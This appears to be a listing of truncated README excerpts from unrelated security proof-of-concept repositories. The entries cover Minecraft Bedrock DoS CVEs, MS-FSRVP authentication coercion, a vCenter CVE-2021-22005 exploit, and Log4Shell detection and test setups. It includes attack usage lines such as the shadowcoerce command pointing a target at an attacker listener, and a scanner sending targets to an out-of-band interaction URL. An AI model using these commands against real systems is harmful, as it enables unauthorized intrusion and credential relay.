A lightweight, flexible and novel open source poc verification framework

pocsploit is a lightweight, flexible and novel open source PoC verification framework.

Pain points of the PoC frameworks on the market: there are too many params and I don't know how to get started, but only some of them are commonly used. YAML PoC frameworks (like nuclei & xray) are not flexible enough; the conversion cost is very high when writing a PoC. Sometimes it's hard when encountering non-HTTP protocols (only hex can be used). Sometimes a PoC has false positives, which […]


PoC of custom shaders for Piglet

This is a PoC for compiling Piglet fragment shaders using Mesa3D. You need to provide a compatible vertex shader; it is needed because Mesa3D compiles both shaders at once. At most one sampler is currently supported. This is a PoC and can break at any time. victim.c is loosely based on this EGL sample.

Dependencies

Usage

cd compiler
make
bash compile.sh vertex.glsl fragment.glsl output.bin # only outputs the fragment part for now


Details, PoC and patches for CVE-2021-45383 & CVE-2021-45384

There are several network-layer vulnerabilities in the official server of Minecraft: Bedrock Edition (aka Bedrock Server), which allow an attacker to launch a DoS attack. CVE-2021-45383 is an integer overflow leading to a bounds check bypass. CVE-2021-45384 is a null pointer dereference. Here are details, PoCs and possible patches for them. Because both vulnerabilities lie in the network protocol handler, attackers can launch a DoS attack without logging in or being in the server player allowlist. CVE-2021-45383 affects Bedrock Server 1.16.0-1.18.2.03. CVE-2021-45384 is an old vulnerability and affects […]


MS-FSRVP coercion abuse PoC

Credits: Gilles LIONEL (a.k.a. Topotam)
Source: https://twitter.com/topotam77/status/1475701014204461056
Explanation: https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp
MS Docs: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b

"File Server VSS Agent Service" needs to be enabled on the target server.

shadowcoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET

In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn't been requested in a while. TL;DR: run the command twice if it doesn't work.


Cve-2021-22005-exp

0x01 Vulnerability overview

On September 21, 2021, VMware published a security advisory publicly disclosing 19 security vulnerabilities in vCenter Server, with CVSSv3 scores ranging from 4.3 to 9.8. The most severe of them is an arbitrary file upload vulnerability in vCenter Server (CVE-2021-22005), located in the vCenter Server Analytics service, with a CVSSv3 score of 9.8. An attacker with network access to port 443 on vCenter Server can execute code remotely on vCenter Server by uploading a malicious file. The vulnerability can be exploited remotely without authentication, has low attack complexity, and requires no user interaction.

0x02 Affected versions

vCenter Server 7.0 < 7.0 U2c build-18356314
vCenter Server 6.7 < 6.7 U3o build-18485166
Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)
Cloud Foundation (vCenter Server) 3.x < KB85719 (3.10.2.2)
Windows versions of vCenter 6.7 are not affected.

0x03 Vulnerability analysis

https://xz.aliyun.com/t/10524
https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee

0x04 Usage notes

Note: this exp can only target Linux versions of vCenter.

Help


POC for detecting the Log4Shell (Log4J RCE) vulnerability

POC for detecting the Log4Shell (Log4J RCE) vulnerability. Run on a system with python3:

python3 log4shell-poc.py pathToTargetFile InteractionURL

pathToTargetFile - a file containing a list of targets (targets are separated by newlines)
InteractionURL - the endpoint used to monitor out-of-band data extraction or interactions, e.g. https://github.com/projectdiscovery/interactsh

Example Output


Log4j RCE test environment and PoC

log4j RCE test environment, see: https://www.lunasec.io/docs/blog/log4j-zero-day/, using the included python PoC.

build

Either build the jar on your host with mvn clean compile assembly:single, or use docker to build an image with docker build -t log4jpwn .

run

The server will log 3 things (which are also the triggers). You don't have to set all 3: the User-Agent header content, the request path, and the pwn query string parameter. To use: run the container with docker run --rm -p8080:8080 log4jpwn (or […]
